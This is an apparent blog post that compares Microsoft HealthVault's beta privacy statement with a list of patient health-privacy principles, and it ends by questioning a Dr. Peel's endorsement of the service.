Microsoft’s privacy policy: “This privacy statement applies to the data collected by Microsoft through the Microsoft HealthVault beta version (the “Service”); it does not apply to data collected through other online or offline Microsoft sites, products, or services.” So much for “no matter what the source”. Microsoft’ HealthVault privacy policy contradicts this Privacy Principle

  • Give patients the right to opt-in and opt-out of electronic system

Microsoft’s policy indicates that users can quit the system and Microsoft will then delete the data after 90 days. So much for seven generations of custodianship but I guess deleting meets the “opt-out” requirement.

  • Give patients the right to segment sensitive information

No commitment of segmenting information in the privacy statement.

  • Give patients control over who can access their electronic health records

HealthVault says that users can appoint “custodians” your record. Those custodians can then pass this custodian privilege on to others. Ultimately a HealthVault record can easily get out of control of the original owner. That is not to say that this is not a cool feature, but it does not work with the principles. From the HealthVault privacy policy “Because inappropriate granting of access could allow a grantee to violate your privacy or even revoke your access to your own records, we urge you to consider all the consequences carefully before you grant access to your records.” Microsoft’ HealthVault privacy policy contradicts this Privacy Principle

  • Health information disclosed for one purpose may not be used for another purpose before informed consent has been obtained

You can give your health information to “Programs” offered by third party companies. But how will that data be used? From the HealthVault privacy policy: “Please refer to the privacy statements of those Programs for information about their privacy policies, and about how your information will be used by those Programs.” Microsoft’ HealthVault privacy policy contradicts this Privacy Principle

  • Require audit trails of every disclosure of patient information

Perhaps Microsoft will do this… Microsoft makes no commitment in the privacy policy.

  • Require that patients be notified promptly of suspected or actual privacy breaches

Perhaps Microsoft will do this… Microsoft makes no commitment in the privacy policy.

  • Ensure that consumers can not be compelled to share health information to obtain employment, insurance, credit, or admission to schools, unless required by statute

Whose statutes? If my record is in China, does that government have the right to get to it? Microsoft explicitly states ” Personal information collected on the Service may be stored and processed in the United States or any other country in which Microsoft or its affiliates, subsidiaries, or agents maintain facilities, and by using the Service, you consent to any such transfer of information outside of the U.S. “ Given that a US record stored in an offshore site can be compelled by a foreign government. Microsoft’ HealthVault privacy policy contradicts this Privacy Principle

  • Deny employers access to employees’ medical records before informed consent has been obtained

Perhaps Microsoft will do this… Microsoft makes no commitment in the privacy policy.

  • Preserve stronger privacy protections in state laws

Perhaps Microsoft will do this… Microsoft makes no commitment in the privacy policy.

  • No secret health databases. Consumers need a clean slate. Require all existing holders of health information to disclose if they hold a patient’s health information

Perhaps Microsoft will do this… Microsoft makes no commitment in the privacy policy.

  • Provide meaningful penalties and enforcement mechanisms for privacy violations detected by patients, advocates, and government regulators

Perhaps Microsoft will do this… Microsoft makes no commitment in the privacy policy.

In short, Microsoft’s commitment to follow the policy is a commitment that they have NOT made in their policy. Microsoft is basically saying “Trust us, this is secure and private”. Everything about Microsoft’s history indicates that commitments to privacy and security are bogus. What exactly made the Dr. Peel conclude they are the market leader in Health Record security and privacy? What made her conclude that Microsoft has “committed” to third party audits?

Perhaps Dr. Peel is discussing a subject as though she were an expert, when in fact she has had little relevant training on the subject.